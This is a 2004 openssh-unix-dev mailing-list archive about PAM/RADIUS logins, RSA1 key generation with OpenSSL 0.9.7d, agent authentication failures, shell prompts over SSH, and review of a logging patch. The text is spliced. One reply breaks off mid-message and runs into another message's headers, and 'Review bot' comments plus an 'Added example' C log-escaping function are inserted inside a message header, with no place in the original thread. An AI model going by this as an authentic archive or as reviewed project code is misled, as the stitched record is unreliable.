From: mhaverkamp at kcp.com (Michael Haverkamp) Date: Tue, 23 Mar 2004 10:56:49 -0600 Subject: OpenSSH and pam_radius_auth.so In-Reply-To: <945D56628248B64AA347DA4BB22C987702B3C6@ditg-ex01.ditg.co.uk> References: <945D56628248B64AA347DA4BB22C987702B3C6@ditg-ex01.ditg.co.uk> Message-ID: <40606C51.4030807@kcp.com> Is upgrading PuTTY an option? I have had problems with PuTTY 0.52 and recent versions of OpenSSH. I believe it is because PuTTY 0.52 does not support KbdInteractive. PuTTY 0.53b or newer should work. Paul Abel wrote: > Hi, > > I have recently upgraded from OpenSSH-3.5 to OpenSSH-3.8 on my Red Hat 6.2 servers. I use radius (pam_radius_auth) for ssh authentication. Since the upgrade ssh1 (putty 0.52) logins are failing. I've come to the conclusion that pam is skipping the radius section of the config file and is falling back to standard unix authentication. > > Is there any way of making ssh1 work with radius on recent versions of OpenSSH? > > Here is my pam config file: > > #%PAM-1.0 > auth sufficient /lib/security/pam_radius_auth.so debug > auth required /lib/security/pam_pwdb.so shadow nodelay > auth required /lib/security/pam_nologin.so > account sufficient /lib/security/pam_radius_auth.so > account required /lib/security/pam_pwdb.so > password sufficient /lib/security/pam_radius_auth.so > password required /lib/security/pam_pwdb.so shadow nullok use_authtok > session required /lib/security/pam_pwdb.so > session required /lib/security/pam_limits.so > > Thanks, > Paul Abel > > > This E-mail message, including any attachments, is intended only for the person or entity to which it is addressed, and may contain confidential information. If you are not the intended recipient, any review, retransmission, disclosure, copying, modification or other use of this E-mail message or attachments is strictly forbidden. If you have received this E-mail message in error, please contact the author and delete the message and any attachments from your computer. 
You are also advised that the views and opinions expressed in this E-mail message and any attachments are the author's own, and may not reflect the views and opinions of Digital Interactive Television Group. > > _______________________________________________ > openssh-unix-dev mailing list > openssh-unix-dev at mindrot.org > http://www.mindrot.org/mailman/listinfo/openssh-unix-dev -- Michael Haverkamp From markus_moeller at compuserve.com Wed Mar 24 11:34:23 2004 From: markus_moeller at compuserve.com (Markus Moeller) Date: Wed, 24 Mar 2004 00:34:23 -0000 Subject: GSSAPI patch for multihomed hosts Message-ID: <000801c41137$c51d1ef0$fa00a8c0@home> Hi, This is another attempt to get my gssapi for multi homed systems into openssh. Please find attach a small change so that gssapi authentication works on multihomed systems. Regards Markus -------------- next part -------------- A non-text attachment was scrubbed... Name: openssh-3.8p1-mm.diff Type: application/octet-stream Size: 3599 bytes Desc: not available Url : http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20040324/41cbc9e0/attachment.obj From imhaeuse at physik.uni-wuppertal.de Wed Mar 24 18:28:17 2004 
From: imhaeuse at physik.uni-wuppertal.de (Martin Imhaeuser)
Date: Wed, 24 Mar 2004 08:28:17 +0100
Subject: ssh only with password
References: <200403181536.40609.imhaeuse@physik.uni-wuppertal.de> <20040321185315.GA28339@misery.proulx.com> <20040323125741.G29714@greenie.muc.de> <20040323184103.GA7928@misery.proulx.com> <20040323222504.N29714@greenie.muc.de>
Message-ID: <40613891.1080906@physik.uni-wuppertal.de>

Hi all,

first thank you for help. But nothing works.

* I have deleted all files in my home directory and started again fresh.
* I have taken the commands "mv" and "cat" and checked the permissions.

Further the remote machine and the local machine are the same. I login as imhaeuse (user) on milaptop (machine), open a shell, type exec ssh-agent $SHELL and ssh-add, give my passphrase and finally type ssh imhaeuse at milaptop. This should be the moment where my password is not needed any longer. BUT I must enter my password. The funny thing is when I login as root on milaptop the procedure is working meaning that I must not enter my password for root.

Following you see my context in the shell after the command "ssh milaptop -vvv":

[imhaeuse at milaptop imhaeuse]$ ssh milaptop -vvv
OpenSSH_3.4p1-CERN20020919, SSH protocols 1.5/2.0, OpenSSL 0x0090602f
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: Applying options for *
debug1: Rhosts Authentication disabled, originating port will not be trusted.
debug1: ssh_connect: needpriv 0
debug1: Connecting to milaptop [127.0.0.1] port 22.
debug1: Connection established.
debug1: identity file /home/imhaeuse/.ssh/identity type 0
debug1: identity file /home/imhaeuse/.ssh/id_rsa type -1
debug1: identity file /home/imhaeuse/.ssh/id_dsa type -1
debug1: Remote protocol version 1.99, remote software version OpenSSH_3.4p1-CERN20020919
debug1: match: OpenSSH_3.4p1-CERN20020919 pat OpenSSH*
debug1: Local version string SSH-1.5-OpenSSH_3.4p1-CERN20020919
debug1: Waiting for server public key.
debug1: Received server public key (768 bits) and host key (1024 bits).
debug3: check_host_in_hostfile: filename /home/imhaeuse/.ssh/known_hosts
debug3: check_host_in_hostfile: match line 1
debug1: Host 'milaptop' is known and matches the RSA1 host key.
debug1: Found key in /home/imhaeuse/.ssh/known_hosts:1
debug1: Encryption type: 3des
debug1: Sent encrypted session key.
debug1: cipher_init: set keylen (16 -> 32)
debug1: cipher_init: set keylen (16 -> 32)
debug1: Installing crc compensation attack detector.
debug1: Received encrypted confirmation.
debug1: Trying Kerberos v5 authentication.
debug3: Trying to reverse map address 127.0.0.1.
debug1: Kerberos v5: krb5_mk_req failed: No credentials cache found
debug1: Trying Kerberos v4 authentication.
debug1: Kerberos v4: no ticket file /tmp/tkt500
debug1: Trying RSA authentication via agent with 'imhaeuse at milaptop'
debug1: Server refused our key.
debug1: RSA authentication using agent refused.
debug1: Trying RSA authentication with key '/home/imhaeuse/.ssh/identity'
debug1: Server refused our key.
debug1: Doing password authentication.
imhaeuse at milaptop's password:

Has somebody an idea what is wrong with my system?

Cheers,
Martin

From Vikash.Badal at Comparex.co.za Wed Mar 24 19:47:52 2004
From: Vikash.Badal at Comparex.co.za (Vikash Badal - PCS)
Date: Wed, 24 Mar 2004 10:47:52 +0200
Subject: Request for comment, logging patch
Message-ID: <25DB50FA9257E24AA165033FD431024D6DF492@dxpsi01.africa.enterprise.root>

Greetings.

Attached is a patch that provides more logging information
for example:
Mar 19 08:34:54 secosr5 sshd[7667]: Accepted publickey of vix at wormhole for root from 192.168.1.1 port 1256 ssh2
Mar 19 08:34:54 secosr5 sshd[7667]: executing command 'who' for vix at wormhole as user root
Mar 19 10:37:16 secosr5 sshd[7725]: Accepted publickey of vix at wormhole for root from 192.168.1.1 port 1257 ssh2
Mar 19 10:37:16 secosr5 sshd[7725]: executing command 'scp -f /usr/udd1/dev/openssh-3.8p1.patch' for vix at wormhole as user root

Can this code be reviewed and possibly added to the code base ?
Please let me know what is incorrect with this code.

Thanks
Vikash
-------------- next part --------------
A non-text attachment was scrubbed...
Name: openssh-3.8p1.patch.gz
Type: application/x-gzip
Size: 1887 bytes
Desc: openssh-3.8p1.patch.gz
Url : http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20040324/3a4207a0/attachment.bin

From mark at mcs.vuw.ac.nz Wed Mar 24 20:26:20 2004
From: mark at mcs.vuw.ac.nz (Mark Davies)
Date: Wed, 24 Mar 2004 21:26:20 +1200
Subject: gssapi, alpha's, OpenSSH 3.8p1 failing
In-Reply-To: <200403231722.56628.mark@mcs.vuw.ac.nz>
References: <200403231722.56628.mark@mcs.vuw.ac.nz>
Message-ID: <200403242126.20023.mark@mcs.vuw.ac.nz>

On Tuesday 23 March 2004 17:22, Mark Davies wrote:
> So can anyone suggest if this is an OpenSSH bug (alpha 64bit issue?) or a
> problem with the older Heimdal? And how can I fix this?

To answer my own question - it's a Heimdal issue. Rebuilding with Heimdal 0.6
fixed it in both cases.

cheers
mark

From kumaresh_ind at gmx.net Wed Mar 24 20:30:51 2004
From: kumaresh_ind at gmx.net (Kumaresh)
Date: Wed, 24 Mar 2004 15:00:51 +0530
Subject: SSH RSA1 keygen error with OpenSSL-0.9.7d
References: <004101c40d99$a1e6a060$230110ac@kurco> <405BD603.9010308@zip.com.au>
Message-ID: <037b01c41182$e052a5f0$230110ac@kurco>

> Kumaresh wrote:
> > I have compiled OpenSSL-0.9.7d - the latest version and when
> > OpenSSH-3.7.1p2 is compiled with this ssl library [0.9.7d], I am getting the
> > following error when SSH-1 connection is done.
> > I am using HP-UX IPF box and
> > I am doing 32 bit compilation only. Even I have changed the optimization
> > level for OpenSSL and no use.
>
> Does OpenSSL's "make test" self-test pass?

Thanks Darren. The tests failed with BN_XXX tests.
This was an issue with the optimization level when OpenSSL was built. The
default optimization was +03 and this was changed to +01 and it worked now.

But, now there is another problem in SSH-1 when I compiled OpenSSH-3.7.1p2
with OpenSSL-0.9.7d. [The "make test" in OpenSSL passed].

When I generate RSA1 key with the new ssh-keygen [with OpenSSL-0.9.7d],
# ssh-keygen -b 1024 -t rsa1 -f /.ssh/identity

The key created [in /.ssh/identity.pub], looks like:
1024 0 000000000100.............

This is an invalid key. The exponent cannot be 0.
So the SSH-1 connection with RSA authentication is not working.
But, other keys like DSA and RSA works fine as the keys generated are proper
and so there are no issues with SSH-2.

If I generate the key using the older build, i.e., OpenSSH-3.7.1p2 built
with OpenSSL-0.9.7c, the key for RSA1 is:
1024 35 150857062.....

Any ideas?

Advance thanks,
Kumaresh.

From dtucker at zip.com.au Wed Mar 24 22:48:38 2004
From: dtucker at zip.com.au (Darren Tucker)
Date: Wed, 24 Mar 2004 22:48:38 +1100
Subject: SSH RSA1 keygen error with OpenSSL-0.9.7d
In-Reply-To: <037b01c41182$e052a5f0$230110ac@kurco>
References: <004101c40d99$a1e6a060$230110ac@kurco> <405BD603.9010308@zip.com.au> <037b01c41182$e052a5f0$230110ac@kurco>
Message-ID: <40617596.8080702@zip.com.au>

Kumaresh wrote:
> Thanks Darren. The tests failed with BN_XXX tests.
> This was an issue with the optimization level when OpenSSL was built. The
> default optimization was +03 and this was changed to +01 and it worked now.
>
> But, now there is another problem in SSH-1 when I compiled OpenSSH-3.7.1p2
> with OpenSSL-0.9.7d. [The "make test" in OpenSSL passed].
>
> When I generate RSA1 key with the new ssh-keygen [with OpenSSL-0.9.7d],
> # ssh-keygen -b 1024 -t rsa1 -f /.ssh/identity
>
> The key created [in /.ssh/identity.pub], looks like:
> 1024 0 000000000100.............
>
> This is an invalid key. The exponent cannot be 0.

This does not fill me with confidence that OpenSSL is working properly :-)

Does "openssl genrsa" work? Try

openssl genrsa >tmpkey
openssl rsa -check -noout
References: <25DB50FA9257E24AA165033FD431024D6DF492@dxpsi01.africa.enterprise.root>
Message-ID: <40616EAA.30605@zip.com.au>

Vikash Badal - PCS wrote:
> Greetings.
>
> Attached is a patch that provides more logging information
> for example:
> Mar 19 08:34:54 secosr5 sshd[7667]: Accepted publickey of vix at wormhole for root from 192.168.1.1 port 1256 ssh2
> Mar 19 08:34:54 secosr5 sshd[7667]: executing command 'who' for vix at wormhole as user root
> Mar 19 10:37:16 secosr5 sshd[7725]: Accepted publickey of vix at wormhole for root from 192.168.1.1 port 1257 ssh2
> Mar 19 10:37:16 secosr5 sshd[7725]: executing command 'scp -f /usr/udd1/dev/openssh-3.8p1.patch' for vix at wormhole as user root
>
> Can this code be reviewed and possibly added to the code base ?
> Please let me know what is incorrect with this code.

> +extern char realname[64];

"realname" is populated with a copy of the address part of the comment
in the key. Firstly, I'm not keen on logging too much user-controlled
data, and there's no reason why the comment won't be longer than 64 chars...

If you must log it, you should probably run it through strnvis to escape
any nasties.

> /* cp now points to the comment part. */
> + comment = cp;
> + commentlen = strlen(comment);
> + if (commentlen > 0 && comment[commentlen -1] == '\n')
> + comment[commentlen - 1] = '\0';

You're modifying the source string, although it looks like you're trying
not to (comment and cp are just pointers that point to the same chunk of
memory). You should probably use xstrdup (but see above).

+extern char user_name[16];
> + strncpy(user_name, authctxt->user, sizeof(user_name) -1 );

Is it really necessary to keep another copy of the_authctxt->user? And
what guarantee is there that it's less than 16 chars?

--
Darren Tucker (dtucker at zip.com.au)
GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69
Good judgement comes with experience. Unfortunately, the experience
usually comes from bad judgement.

From Vikash.Badal at Comparex.co.za Wed Mar 24 23:34:34 2004
From: Vikash.Badal at Comparex.co.za (Vikash Badal - PCS)
Date: Wed, 24 Mar 2004 14:34:34 +0200
Subject: Request for comment, logging patch
Message-ID: <25DB50FA9257E24AA165033FD431024D01C722@dxpsi01.africa.enterprise.root>

Greetings,

> -----Original Message-----
> From: Darren Tucker [mailto:dtucker at zip.com.au]
> Sent: 24 March 2004 01:19
> To: Vikash Badal - PCS
> Cc: openssh-unix-dev at mindrot.org
> Subject: Re: Request for comment, logging patch
>
>
> Vikash Badal - PCS wrote:
> > Greetings.
> >
< ... SNIP>
> in the key. Firstly, I'm not keen on logging too much
> user-controlled
> data, and there's no reason why the comment won't be longer
> than 64 chars...
>
In my haste to get this working, I took an arbitrary value

> If you must log it, you should probably run it through
> strnvis to escape
> any nasties.
will definitely learn more about this

>
> > /* cp now points to the comment part. */
> > + comment = cp;
> > + commentlen = strlen(comment);
> > + if (commentlen > 0 && comment[commentlen -1] == '\n')
> > + comment[commentlen - 1] = '\0';
>
> You're modifying the source string, although it looks like
> you're trying
> not to (comment and cp are just pointers that point to the
> same chunk of
> memory). You should probably use xstrdup (but see above).
>
Thanks, I will work on this.

> +extern char user_name[16];
> > + strncpy(user_name, authctxt->user, sizeof(user_name) -1 );
>
> Is it really necessary to keep another copy of
> the_authctxt->user? And
> what guarantee is there that it's less than 16 chars?
this part is from my ignorance of coding, sorry, still got a lot to learn.

Thanks for the feedback, I will work with the comments you have provided
and hopefully learn more.

I have no idea if this was a good idea or not, but in the environment in
which I administer systems, user accounts are shared (I know it's stupid,
but I have no power over this).

Thanks again, I have certainly gained some knowledge at the very least.

Vikash

From niclas.c.backman at ericsson.com Thu Mar 25 01:05:38 2004
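Review bot: in the hunk that sets "comment = cp;", the trim "comment[commentlen - 1] = '\0';" writes through an alias of the line buffer and removes only a trailing '\n', so a '\r' or any control byte inside the comment still reaches the log call unchanged. Take a private copy before trimming, and escape non-printable bytes in that copy before it is logged.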
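Review bot: "strncpy(user_name, authctxt->user, sizeof(user_name) -1 );" silently cuts any login name longer than 15 bytes, so the audit line can show a shorter name than the one in authctxt->user, and the copy is only NUL-terminated as long as the last byte of the extern array is never written. Pass authctxt->user to the log call directly instead of keeping a second fixed-size copy; if a copy is unavoidable, size it from the source and make truncation visible.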
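Added example (not part of the patch under review and not OpenSSH code): one way to act on the review comments in this thread, building the log fields from a private, escaped copy instead of editing the line buffer in place, with no fixed 16- or 64-byte globals. log_safe_field(), audit_line() and MAX_LOGGED_FIELD are hypothetical names, and the octal escaping is a portable stand-in for strnvis(), which is not available in every libc.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_LOGGED_FIELD 128    /* hypothetical cap on one logged field */
#define ELLIPSIS "..."          /* marks a field that was cut short */

/*
 * Return a malloc'ed, log-safe copy of src (caller frees), or NULL on error.
 * src is never written to. A trailing CR/LF is dropped, backslash is doubled,
 * and every byte outside printable ASCII becomes \ooo, so one field cannot
 * start a second log line. The result, including its NUL, fits in max_out
 * bytes; a cut is made on an escape boundary and marked with "...".
 */
char *log_safe_field(const char *src, size_t max_out)
{
    size_t len = strlen(src), o = 0, cut = 0, i;
    char *out;

    if (max_out < sizeof(ELLIPSIS) || len > (SIZE_MAX - 1) / 4)
        return NULL;
    /* Trim the line ending by shortening our view of src, not by editing it. */
    while (len > 0 && (src[len - 1] == '\n' || src[len - 1] == '\r'))
        len--;
    if ((out = malloc(4 * len + 1)) == NULL)   /* worst case: 4 chars per byte */
        return NULL;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)src[i];

        if (c == '\\') {
            out[o++] = '\\';
            out[o++] = '\\';
        } else if (c >= 0x20 && c < 0x7f) {
            out[o++] = (char)c;
        } else {
            o += (size_t)snprintf(out + o, 5, "\\%03o", (unsigned int)c);
        }
        /* Remember the last point where "..." plus NUL would still fit. */
        if (o + sizeof(ELLIPSIS) <= max_out)
            cut = o;
    }
    out[o] = '\0';
    if (o + 1 > max_out)
        memcpy(out + cut, ELLIPSIS, sizeof(ELLIPSIS));
    return out;
}

/*
 * Build "Accepted publickey of <comment> for <user>" with both fields
 * escaped. The line is sized from its contents, so no name is truncated
 * just because it is longer than some fixed buffer.
 */
char *audit_line(const char *user, const char *comment_line)
{
    static const char fmt[] = "Accepted publickey of %s for %s";
    char *c = log_safe_field(comment_line, MAX_LOGGED_FIELD);
    char *u = log_safe_field(user, MAX_LOGGED_FIELD);
    char *line = NULL;

    if (c != NULL && u != NULL) {
        int n = snprintf(NULL, 0, fmt, c, u);

        if (n >= 0 && (line = malloc((size_t)n + 1)) != NULL)
            snprintf(line, (size_t)n + 1, fmt, c, u);
    }
    free(c);
    free(u);
    return line;
}

int main(void)
{
    /* Constructed input: a key comment with an embedded newline. */
    char key_comment[] = "vix@wormhole\nforged line\n";
    char *msg = audit_line("root", key_comment);

    if (msg == NULL)
        return 1;
    puts(msg);
    free(msg);
    return 0;
}
```
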
From: niclas.c.backman at ericsson.com (Niclas Bäckman C (LI/EAB))
Date: Wed, 24 Mar 2004 15:05:38 +0100
Subject: Where does the "prompt come from"
Message-ID:

Hi All !
I have a little question about the shell that is run when establishing a
connection towards an SSH server.
The client(OpenSSH) displays a prompt(as usual) when a command is executed,
but my question is, where does the prompt come from.
Is it sent by the remote shell or is it handled in the client ??

The reason I ask is that we have developed a product that redirects
stdin/stdout/stderr from the ssh binary to a socket, and we then
perform socket read/writes directly into the ssh tunnel. But when I perform
a command, the prompt is never read up from the server.
So it's difficult to know when a remote script is finished. Using the same
solution but towards a telnet server always results in a prompt
back to the client.

I would be most grateful for any good ideas/hints in this case.
Thanks in advance !!

e Niclas Bäckman
Software Design | OMSec - team SSH
Ericsson AB
Center for Radio Network Control
Box 1248
581 12 Linköping
Sweden

New e-mail address:
> * E-mail: : Niclas.c.Backman at ericsson.com
Please Update your address book.
> * Phone : +46 13 287604
> * Mobile : +46 73 0435819
>
>
This communication is confidential and intended solely for the addressee(s). Any unauthorized review, use, disclosure or distribution is prohibited. If you believe this message has been sent to you in error, please notify the sender by replying to this transmission and delete the message without disclosing it. Thank you.

E-mail including attachments is susceptible to data corruption, interruption, unauthorized amendment, tampering and viruses, and we only send and receive e-mails on the basis that we are not liable for any such corruption, interception, amendment, tampering or viruses or any consequences thereof.

From bob at proulx.com Thu Mar 25 05:07:18 2004
From: bob at proulx.com (Bob Proulx)
Date: Wed, 24 Mar 2004 11:07:18 -0700
Subject: ssh only with password
In-Reply-To: <20040323222504.N29714@greenie.muc.de>
References: <200403181536.40609.imhaeuse@physik.uni-wuppertal.de> <20040321185315.GA28339@misery.proulx.com> <20040323125741.G29714@greenie.muc.de> <20040323184103.GA7928@misery.proulx.com> <20040323222504.N29714@greenie.muc.de>
Message-ID: <20040324180718.GA7853@misery.proulx.com>

Gert Doering wrote:
> Bob Proulx wrote:
> > > > Also, sometimes people do this with a text editor and accidentally
> > > > word wrap the file. Therefore I recommend simply appending them with
> > > > the shell and cat. These steps will correct any problems here.
> > > >
> > > > mv $HOME/.ssh/authorized_keys $HOME/.ssh/authorized_keys.bak
> > >
> > > make that a "cp"...
> >
> > Negative. Using 'cp' would not correct the problem with the original
> > file. It would still be word wrapped. So 'mv' is better if you are
> > trying to start again clean.
>
> Well, I agree on that. Even so, your example isn't really consistent in
> itself - the next line uses "cat $singlefile >>authorized_keys" - so
> you'll have only *one* key in there, and the ">>" is no different from
> ">".
>
> That's why I assumed you meant "append new key to the end, but save the
> file in any case".

People tend to save snippets like that in files of notes and use them
later out of context by cut-n-paste. My use of >> was just paranoia.
If later someone decides to use that line to add another key to the
file (after all, that is how they added the first key) then it won't
overwrite their file at that later time and possibly lock themselves
out of a system.

Bob

From v_t_m at seznam.cz Thu Mar 25 08:52:26 2004
From: v_t_m at seznam.cz (Václav Tomec)
Date: Wed, 24 Mar 2004 22:52:26 +0100 (CET)
Subject: PATCH: GSSAPI authentication in PuTTY
Message-ID: <300597.1133764-7651-1920466199-1080165146@seznam.cz>

Hello,

I have made GSSAPI authentication for PuTTY 0.54.
This patch is available here:
http://sweb.cz/v_t_m/

Vaclav

From eddy at cdf-imaging.com Thu Mar 25 09:38:56 2004
From: eddy at cdf-imaging.com (Edward Flick)
Date: Wed, 24 Mar 2004 16:38:56 -0600
Subject: PATCH: GSSAPI authentication in PuTTY
In-Reply-To: <300597.1133764-7651-1920466199-1080165146@seznam.cz>
References: <300597.1133764-7651-1920466199-1080165146@seznam.cz>
Message-ID: <40620E00.8030908@cdf-imaging.com>

Why aren't you submitting this to the PuTTY crew? Is PuTTY based on
OpenSSH?

Václav Tomec wrote:
| Hello,
|
| I have made GSSAPI authentication for PuTTY 0.54.
| This patch is available here:
| http://sweb.cz/v_t_m/
|
| Vaclav
|
| _______________________________________________
| openssh-unix-dev mailing list
| openssh-unix-dev at mindrot.org
| http://www.mindrot.org/mailman/listinfo/openssh-unix-dev

From djm at mindrot.org Thu Mar 25 10:56:16 2004
From: djm at mindrot.org (Damien Miller)
Date: Thu, 25 Mar 2004 10:56:16 +1100
Subject: Where does the "prompt come from"
In-Reply-To:
References:
Message-ID: <40622020.4060703@mindrot.org>

Niclas Bäckman C (LI/EAB) wrote:
> Hi All !
> I have a little question about the shell that is run when establishing a
> connection towards an SSH server.
> The client(OpenSSH) displays a prompt(as usual) when a command is executed,
> but my question is, where does the prompt come from.
> Is it sent by the remote shell or is it handled in the client ??
>
> The reason I ask is that we have developed a product that redirects
> stdin/stdout/stderr from the ssh binary to a socket, and we then
> perform socket read/writes directly into the ssh tunnel. But when i perform
> a command, the prompt is never read up from the server.
> So it's difficult to know when a remote script is finished. Using the same
> solution but towards a telnet server always results in a prompt
> back to the client.

The prompt comes from the shell that the server executes.

If you want to use OpenSSH as a transport, you should probably invent a
little protocol and implement it as a subsystem. sftp does this.

-d

From mouring at etoh.eviladmin.org Thu Mar 25 11:12:11 2004
From: mouring at etoh.eviladmin.org (Ben Lindstrom)
Date: Wed, 24 Mar 2004 18:12:11 -0600 (CST)
Subject: PATCH: GSSAPI authentication in PuTTY
In-Reply-To: <40620E00.8030908@cdf-imaging.com>
Message-ID:

On Wed, 24 Mar 2004, Edward Flick wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Why aren't you submitting this to the PuTTY crew? Is PuTTY based on
> OpenSSH?
>

No PuTTY is not based on OpenSSH.

- Ben

From bob at proulx.com Thu Mar 25 15:21:11 2004
From: bob at proulx.com (Bob Proulx)
Date: Wed, 24 Mar 2004 21:21:11 -0700
Subject: ssh only with password
In-Reply-To: <40613891.1080906@physik.uni-wuppertal.de>
References: <200403181536.40609.imhaeuse@physik.uni-wuppertal.de> <20040321185315.GA28339@misery.proulx.com> <20040323125741.G29714@greenie.muc.de> <20040323184103.GA7928@misery.proulx.com> <20040323222504.N29714@greenie.muc.de> <40613891.1080906@physik.uni-wuppertal.de>
Message-ID: <20040325042111.GA26231@misery.proulx.com>

Martin Imhaeuser wrote:
> * I have deleted all files in my home directory and started again fresh.
> * I have taken the commands "mv" and "cat" and checked the permissions.

I had to start there...

> Further the remote machine and the local machine are the same. I login
> as imhaeuse (user) on milaptop (machine), open a shell, type exec
> ssh-agent $SHELL and ssh-add, give my passphrase and finally type ssh
> imhaeuse at milaptop. This should be the moment where my password is not
> needed any longer. BUT I must enter my password.
>
> The funny thing is when I login as root on milaptop the procedure is
> working meaning that I must not enter my password for root.

Do you have a .shosts or .rhosts file or hosts.equiv enabling this?
If you are root then ssh will start with a privileged port. Of course
this depends upon other configuration too but could explain why root
is allowed without a password. If this is the issue then 'ssh -P' as
root should avoid getting a privileged port and have the same behavior
as a non-root user.

> Following you see my context in the shell after the command "ssh milaptop
> -vvv":

I am going to need some help from the list to completely decode this.

> [imhaeuse at milaptop imhaeuse]$ ssh milaptop -vvv
> OpenSSH_3.4p1-CERN20020919, SSH protocols 1.5/2.0, OpenSSL 0x0090602f
> debug1: Reading configuration data /etc/ssh/ssh_config
> debug1: Applying options for *
> debug1: Rhosts Authentication disabled, originating port will not be
> trusted.
> debug1: ssh_connect: needpriv 0
> debug1: Connecting to milaptop [127.0.0.1] port 22.
> debug1: Connection established.
> debug1: identity file /home/imhaeuse/.ssh/identity type 0
> debug1: identity file /home/imhaeuse/.ssh/id_rsa type -1
> debug1: identity file /home/imhaeuse/.ssh/id_dsa type -1

Does this mean that you are using ssh protocol 1 keys? Can you use
protocol 2 keys, as I suggested by 'ssh-keygen -t rsa'? Is your
server configured to allow protocol 1 keys?

What does 'ssh-add -l' say? Does it show an RSA key or an RSA1 key?

> debug1: Remote protocol version 1.99, remote software version
> OpenSSH_3.4p1-CERN20020919
> debug1: match: OpenSSH_3.4p1-CERN20020919 pat OpenSSH*
> debug1: Local version string SSH-1.5-OpenSSH_3.4p1-CERN20020919
> debug1: Waiting for server public key.
> debug1: Received server public key (768 bits) and host key (1024 bits).
> debug3: check_host_in_hostfile: filename /home/imhaeuse/.ssh/known_hosts
> debug3: check_host_in_hostfile: match line 1
> debug1: Host 'milaptop' is known and matches the RSA1 host key.
> debug1: Found key in /home/imhaeuse/.ssh/known_hosts:1
> debug1: Encryption type: 3des
> debug1: Sent encrypted session key.
> debug1: cipher_init: set keylen (16 -> 32)
> debug1: cipher_init: set keylen (16 -> 32)
> debug1: Installing crc compensation attack detector.
> debug1: Received encrypted confirmation.
> debug1: Trying Kerberos v5 authentication.
> debug3: Trying to reverse map address 127.0.0.1.
> debug1: Kerberos v5: krb5_mk_req failed: No credentials cache found
> debug1: Trying Kerberos v4 authentication.
> debug1: Kerberos v4: no ticket file /tmp/tkt500
> debug1: Trying RSA authentication via agent with 'imhaeuse at milaptop'
> debug1: Server refused our key.
> debug1: RSA authentication using agent refused.

I think no protocol 2 key was found here.

> debug1: Trying RSA authentication with key '/home/imhaeuse/.ssh/identity'
> debug1: Server refused our key.

Looks like protocol 1 key was rejected.

> debug1: Doing password authentication.
> imhaeuse at milaptop's password:
>
> Has somebody an idea what is wrong with my system?

I may have the above analysis wrong. But it is my best guess.
Hopefully someone on the list will correct me.

Bob

From niclas.c.backman at ericsson.com Thu Mar 25 18:33:58 2004
From: niclas.c.backman at ericsson.com (Niclas Bäckman C (LI/EAB))
Date: Thu, 25 Mar 2004 08:33:58 +0100
Subject: Where does the "prompt come from"
Message-ID:

Hi Damien !
Thanks for your feedback !
We have implemented a secure command line interface api that wants to perform "normal" shell
operations, but from an application.
That's why I don't want to add a new subsystem.
I just want to run for instance scripts, towards a secured remote host. But the data that is passed
to the socket doesn't include the prompt itself, like '>'. The socket is a redirect from the client's
stdout/stderr.
If I use a standard client like OpenSSH the client echoes back the prompt after a command is executed,
but in my scenario it's lost and never written to stdout/stderr(my socket).
Does the SSH client remove the prompt in some way before data is passed to stdout/stderr ??
Many thanks in advance !
/Niclas

-----Original Message-----
From: Damien Miller [mailto:djm at mindrot.org]
Sent: 25 March 2004 00:56
To: Niclas Bäckman C (LI/EAB)
Cc: 'openssh-unix-dev at mindrot.org'
Subject: Re: Where does the "prompt come from"

Niclas Bäckman C (LI/EAB) wrote:
> Hi All !
> I have a little question about the shell that is run when establishing a
> connection towards an SSH server.
> The client(OpenSSH) displays a prompt(as usual) when a command is executed,
> but my question is, where does the prompt come from.
> Is it sent by the remote shell or is it handled in the client ??
>
> The reason I ask is that we have developed a product that redirects
> stdin/stdout/stderr from the ssh binary to a socket, and we then
> perform socket read/writes directly into the ssh tunnel. But when i perform
> a command, the prompt is never read up from the server.
> So it's difficult to know when a remote script is finished. Using the same
> solution but towards a telnet server always results in a prompt
> back to the client.

The prompt comes from the shell that the server executes.

If you want to use OpenSSH as a transport, you should probably invent a
little protocol and implement it as a subsystem. sftp does this.

-d

From djm at mindrot.org Thu Mar 25 19:10:46 2004
From: djm at mindrot.org (Damien Miller)
Date: Thu, 25 Mar 2004 19:10:46 +1100
Subject: Where does the "prompt come from"
In-Reply-To:
References:
Message-ID: <40629406.7060500@mindrot.org>

Niclas Bäckman C (LI/EAB) wrote:
> Hi Damien !
> Thanks for your feedback !
> We have implemented a secure command line interface api that wants to perform "normal" shell
> operations, but from an application.
> That's why I don't want to add a new subsystem.
> I just want to run for instance scripts, towards a secured remote host. But the data that is passed
> to the socket doesn't include the prompt itself, like '>'. The socket is a redirect from the client's
> stdout/stderr.
> If I use a standard client like OpenSSH the client echoes back the prompt after a command is executed,
> but in my scenario it's lost and never written to stdout/stderr(my socket).
> Does the SSH client remove the prompt in some way before data is passed to stdout/stderr ??
> Many thanks in advance !

No, neither the client nor the server modify the data from a user's shell.

If you are doing the equivalent of "ssh somehost command" then there
will never be a prompt displayed.

From dtucker at zip.com.au Thu Mar 25 19:00:41 2004
From: dtucker at zip.com.au (Darren Tucker)
Date: Thu, 25 Mar 2004 19:00:41 +1100
Subject: Where does the "prompt come from"
In-Reply-To:
References:
Message-ID: <406291A9.3030702@zip.com.au>

Niclas Bäckman C (LI/EAB) wrote:
> If I use a standard client like OpenSSH the client echoes back the prompt after a command is executed,
> but in my scenario it's lost and never written to stdout/stderr(my socket).
> Does the SSH client remove the prompt in some way before data is passed to stdout/stderr ??
> Many thanks in advance !

You could try forcing an interactive shell:

ssh yourhost /bin/sh -i

--
Darren Tucker (dtucker at zip.com.au)
GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69
Good judgement comes with experience. Unfortunately, the experience
usually comes from bad judgement.

From aphor at speakeasy.net Fri Mar 26 00:52:21 2004
From: aphor at speakeasy.net (Jeremy McMillan)
Date: Thu, 25 Mar 2004 07:52:21 -0600
Subject: openssh-unix-dev Digest, Vol 11, Issue 28
In-Reply-To: <20040325081402.BC9C627C2BB@shitei.mindrot.org>
References: <20040325081402.BC9C627C2BB@shitei.mindrot.org>
Message-ID:

The shell that executes on the remote server takes input in the form of
shell commands before it issues a prompt. When you redirect commands
from ssh client to a shell on the remote server there is usually a
